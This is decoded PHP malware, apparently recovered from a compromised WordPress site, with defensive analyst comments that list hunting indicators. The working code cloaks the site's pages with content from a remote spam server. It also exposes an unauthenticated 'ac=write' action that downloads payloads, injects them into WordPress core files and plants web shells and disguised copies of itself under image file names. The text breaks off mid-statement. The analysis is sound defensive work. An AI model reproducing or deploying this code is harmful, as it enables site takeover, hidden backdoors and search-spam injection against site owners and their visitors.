/* Decoded by unphp.net */
// Analyst annotation (defensive): this is decoded output of a script that proxies
// page, stylesheet and sitemap content from a remote host into the responses of the
// site it runs on, and exposes maintenance actions through the `ac` query parameter.
// Hunting signals visible in this block: outbound HTTP from the web server to the two
// hard-coded hosts, requests carrying ac=write / ac=check / ac=sitemap, and the files
// css/load.php and wp-admin/images/arrow-lefts.png.

// All PHP error reporting is switched off, so failures below leave no PHP error output.
error_reporting(0);
// Remote host that both URL templates below point at.
$go_domain = "seo31.tophead.online";
// Visitor metadata collected for forwarding: first 4 bytes of Accept-Language,
// the Referer and the User-Agent (empty string when the header is falsy).
$language = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 4);
$userrefer = $_SERVER['HTTP_REFERER']?$_SERVER['HTTP_REFERER']:"";
$useragent = $_SERVER['HTTP_USER_AGENT']?$_SERVER['HTTP_USER_AGENT']:"";
$userip = '';
// Server-side default timezone, also forwarded.
@$timezone_out = date_default_timezone_get();
// Visitor IP: REMOTE_ADDR from the environment first, then from $_SERVER; the literal
// value 'unknown' (case-insensitive) is rejected in both cases.
if(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
    $userip = getenv('REMOTE_ADDR');
} elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
    $userip = $_SERVER['REMOTE_ADDR'];
}
// is_https() is not defined in this block; presumably it reports whether the current
// request arrived over TLS (confirm against its definition).
if(is_https()){
    $http = 'https';
}else{
    $http = 'http';
}
// sprintf templates for the remote fetches. Both use plain http:// and carry the
// local host name, request URI, scheme, referer, user agent and language; the index
// template additionally carries the visitor IP. The remote end therefore receives
// enough to vary its answer per visitor (consistent with cloaking; not verifiable
// from this file alone).
$index_url = "http://$go_domain/index.php?dom=%s&uri=%s&http=%s&refer=%s&agent=%s&lang=%s&ip=%s&zone=%s";
$sitemap_url = "http://$go_domain/sitemap.php?dom=%s&uri=%s&http=%s&refer=%s&agent=%s&lang=%s&zone=%s";
// Host comes from the request's Host header and is used unvalidated below.
$host = $_SERVER['HTTP_HOST'];
$uri = $_SERVER['REQUEST_URI'];
// Action selector read straight from the query string. No authentication or origin
// check is visible before the actions run, so web-server access logs containing these
// `ac` values are a direct record of when they were triggered.
@$action = $_GET['ac']?$_GET['ac']:"";
if($action != "" && $action == "write"){
    // ac=write: calls write() with this script's own file name; write() modifies files
    // on disk (see its definition below).
    $index_name = basename($_SERVER['SCRIPT_NAME']);;
    write($index_name);
    echo "write done!";
    exit();
}elseif($action != "" && $action == "check"){
    // ac=check: reports the boolean result of check(), which is not defined in this
    // block (presumably a self-test for the injected code; confirm).
    $bool = check();
    if($bool){
        echo "check code exists!";
    }else{
        echo "check code not exists!";
    }
    exit();
}elseif($action != "" && $action == "sitemap"){
    // ac=sitemap: requests Google's sitemap ping endpoint for this host's /sitemap.xml
    // and echoes whatever that request returns.
    $sitemap = "https://www.google.com/webmasters/sitemaps/ping?sitemap=$http://$host/sitemap.xml";
    $contents = file_get_contents($sitemap);
    echo $contents;
    exit();
}
// Request routing. get() is not defined in this block; from its use it returns the
// body of the given URL as a string (confirm against its definition).
if(preg_match('@^/sitemap([1-9])?.xml$@i',$uri)){
    // /sitemap.xml and /sitemap1.xml .. /sitemap9.xml, case-insensitive. The dot before
    // "xml" is unescaped, so any single character matches there. The remote response is
    // emitted as XML and the request ends here.
    $request = sprintf($sitemap_url, $host, urlencode($uri), $http, urlencode($userrefer), urlencode($useragent), urlencode($language), urlencode($timezone_out));
    $content = get($request);
    @header("Content-type: text/xml");
    echo trim($content);
    exit();
}elseif(substr($uri, -4) == ".css"){
    // URIs ending in ".css": the remote response is served as CSS only when it contains
    // the marker string, which is stripped first. Without the marker nothing is emitted
    // and execution continues past this chain.
    $request = sprintf($index_url, $host, urlencode($uri), $http, urlencode($userrefer), urlencode($useragent), urlencode($language), $userip, urlencode($timezone_out));
    $content = get($request);
    if(strstr($content,'okhtmlgetcontent')){
        @header("Content-type: text/css; charset=utf-8");
        $content = str_replace("okhtmlgetcontent",'',$content);
        echo trim($content);
        exit();
    }
}else{
    // Every other URI: the remote response decides what the visitor sees. Three markers
    // are recognised: one replaces the page with remote HTML, one forces a 404, and one
    // issues a 301 whose Location is the remote-supplied text. With no marker present,
    // execution continues past this chain; what runs next is outside this view
    // (presumably the site's normal page handling).
    $request = sprintf($index_url, $host, urlencode($uri), $http, urlencode($userrefer), urlencode($useragent), urlencode($language), $userip, urlencode($timezone_out));
    $content = get($request);
    if(strstr($content,'okhtmlgetcontent')){
        @header("Content-type: text/html; charset=utf-8");
        $content = str_replace("okhtmlgetcontent",'',$content);
        echo trim($content);
        exit();
    }else if(strstr($content,'getcontent404page')){
        @header('HTTP/1.1 404 Not Found');
        echo "404 Not Found";
        exit();
    }else if(strstr($content,'getcontent301page')){
        @header('HTTP/1.1 301 Moved Permanently');
        $content = str_replace("getcontent301page",'',$content);
        header('Location: '.trim($content));
        exit();
    }
}
// write(): invoked by the ac=write action with the running script's file name.
// NOTE(review): this definition continues past the end of this block; only the
// statements shown here are described.
function write($index_name){
    // Five text blobs are downloaded over plain HTTP from a second hard-coded host.
    // Their contents are not part of this file, so what gets written can only be
    // established from the files found on disk.
    $write1 = get("http://hello.turnedpro.xyz/write1.txt");
    $write2 = get("http://hello.turnedpro.xyz/write2.txt");
    $write3 = get("http://hello.turnedpro.xyz/write3.txt");
    $shell_postfs = get("http://hello.turnedpro.xyz/mm1.txt");
    $shell_load = get("http://hello.turnedpro.xyz/mm2.txt");
    // Current .htaccess and the current script are read into memory.
    $ht_content = file_get_contents(".htaccess");
    $index_content = file_get_contents($index_name);
    // Paths under wp-includes/, relative to the working directory; they are only
    // assigned here. During clean-up, compare these files against a known-good copy of
    // the same WordPress release.
    $loader_php = "wp-includes/template-loader.php";
    $load_php = "wp-includes/load.php";
    $font_editor_php = "wp-includes/SimplePie/font-editor.php";
    if(!is_dir("css")){
        mkdir("css", 0755, true);
    }
    // When the script is not named index.php, the base64 form of "./index.php" inside
    // the downloaded blobs is swapped for the base64 form of the actual script name.
    if($index_name != "index.php"){
        $write1 = str_replace(base64_encode("./index.php"), base64_encode("./".$index_name), $write1);
        $write2 = str_replace(base64_encode("./index.php"), base64_encode("./".$index_name), $write2);
        $write3 = str_replace(base64_encode("./index.php"), base64_encode("./".$index_name), $write3);
    }
    // One downloaded blob is written to css/load.php: a PHP file in a directory that
    // normally holds only stylesheets is worth flagging in file-integrity checks.
    file_put_contents("css/load.php", $shell_load);
    // The presence of wp-includes/SimplePie is used to detect a WordPress tree.
    if(is_dir("wp-includes/SimplePie")){
        // A copy of this script is stored under an image file name.
        file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
file_put_contents("wp-admin/images/arrow-rights.png", $ht_content); file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content); file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content); $loader_content = file_get_contents($loader_php); $load_content = file_get_contents($load_php); @chmod($loader_php, 0755);@chmod($load_php, 0755); file_put_contents($loader_php, $write1.$loader_content); file_put_contents($load_php, $load_content.$write2); @chmod($loader_php, 0644);@chmod($load_php, 0644); file_put_contents($font_editor_php, $shell_postfs); }else{ if(!is_dir("images")){ mkdir("images", 0755, true); } if(!is_dir("admin")){ mkdir("admin", 0755, true); } file_put_contents("admin/votes.php", $shell_postfs); file_put_contents("images/arrows.png", $index_content); file_put_contents("images/icons.png", $ht_content); file_put_contents("template-load.php", $write3); if(substr(trim($index_content), -2) == "?>" || substr(trim($index_content), -7) == ""){ file_put_contents($index_name, "